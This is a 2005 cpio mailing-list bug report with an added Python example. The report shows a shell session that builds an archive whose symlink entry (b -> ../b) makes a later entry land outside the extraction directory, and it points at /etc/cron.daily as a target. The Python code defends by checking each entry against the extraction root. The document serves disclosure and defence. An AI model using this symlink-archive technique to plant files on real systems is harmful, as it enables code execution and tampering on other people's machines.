[Bug-cpio] Re: Bug#306693: cpio: allows extracting insecure pathnames (leading slash = / and dotdot = ..)

From: t takahashi
Subject: [Bug-cpio] Re: Bug#306693: cpio: allows extracting insecure pathnames (leading slash = / and dotdot = ..)
Date: Wed, 27 Apr 2005 19:54:54 -0700

P.P.S.  I found a more subtle security hole.  It is even more dangerous.

/tmp/aaa$ mkdir ../b
/tmp/aaa$ ln -s ../b b
/tmp/aaa$ touch ../b/trojan
/tmp/aaa$ ls b
trojan
/tmp/aaa$ find b b/trojan
b
b/trojan
/tmp/aaa$ find b b/trojan | cpio -o > dangerous
cpio: b: truncating inode number
cpio: b/trojan: truncating inode number
1 block
/tmp/aaa$ /bin/rm -v b/trojan b
removed `b/trojan'
removed `b'
/tmp/aaa$ ls
dangerous
/tmp/aaa$ cpio -t<dangerous 
b
b/trojan
1 block
/tmp/aaa$ cpio -vt<dangerous 
lrwxrwxrwx   1 kpc      kpc             4 Apr 27 19:46 b -> ../b
-rw-------   1 kpc      kpc             0 Apr 27 19:46 b/trojan
1 block

Notice that grep '\.\.' on the output of cpio -t would not find the
relative pathname.  You have to use cpio -vt.  Now watch this:

/tmp/aaa$ cpio -i<dangerous 
1 block
/tmp/aaa$ ls
b  dangerous
/tmp/aaa$ ls ../b
trojan

IMHO cpio should disallow this by default.  Imagine
../../../../../../../etc/cron.daily again.  cpio should check for
extracting in directories that are not below pwd, even if it is via
indirect means such as a symlink.

Wow!
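The check the report asks for, as an added Python example (not cpio's code and not from the poster): each archive entry is judged against the extraction root with the filesystem in the state earlier entries left it, so a parent that is already a symlink to `../b` is caught, and a symlink entry can be refused by its target before it is created. The `/tmp/aaa` layout is rebuilt in a scratch directory as constructed test data.

```python
import os
import tempfile


def entry_escapes_root(root, member, link_target=None):
    """Return True if creating archive entry `member` under `root` would reach
    outside `root`.  Three checks, in the order the report motivates them:
    an absolute name, a '..' component, and, the subtle case, a parent
    directory that is already a symlink on disk (b -> ../b) so that a later
    entry (b/trojan) lands in ../b.  For a symlink entry pass its target so
    that a link escaping the root is refused before it is ever created."""
    if os.path.isabs(member):
        return True
    parts = member.split("/")
    if ".." in parts:
        return True
    root_real = os.path.realpath(root)
    # Resolve only the parent, following symlinks that exist on disk; the
    # final component is judged by where it is placed, not where it points.
    parent_real = os.path.realpath(os.path.join(root, *parts[:-1]))
    if os.path.commonpath([root_real, parent_real]) != root_real:
        return True
    if link_target is not None:
        target_real = os.path.realpath(os.path.join(parent_real, link_target))
        return os.path.commonpath([root_real, target_real]) != root_real
    return False


def replay_report():
    """Rebuild the /tmp/aaa layout from the report in a scratch directory and
    run the check over the entries in extraction order (constructed data)."""
    with tempfile.TemporaryDirectory() as tmp:
        aaa = os.path.join(tmp, "aaa")       # stands in for /tmp/aaa (cwd)
        os.mkdir(aaa)
        os.mkdir(os.path.join(tmp, "b"))     # the outside target, ../b
        results = {}
        # Entry 1 of the archive: the symlink b -> ../b.
        results["b -> ../b"] = entry_escapes_root(aaa, "b", "../b")
        # An unpatched cpio -i creates it anyway; do the same so that entry 2
        # is judged against the filesystem state it would really meet.
        os.symlink("../b", os.path.join(aaa, "b"))
        # Entry 2: b/trojan, which cpio -t lists with no '..' in sight.
        results["b/trojan"] = entry_escapes_root(aaa, "b/trojan")
        # The obvious forms from earlier in the same bug report.
        results["../b/trojan"] = entry_escapes_root(aaa, "../b/trojan")
        results["../../../../../../../etc/cron.daily"] = entry_escapes_root(
            aaa, "../../../../../../../etc/cron.daily")
        # A normal entry in a not-yet-created subdirectory stays allowed.
        results["safe/file"] = entry_escapes_root(aaa, "safe/file")
        return results
```

Refusing every symlink whose target leaves the root is a policy choice; some legitimate archives carry such links, so an extractor may instead only refuse to write through them.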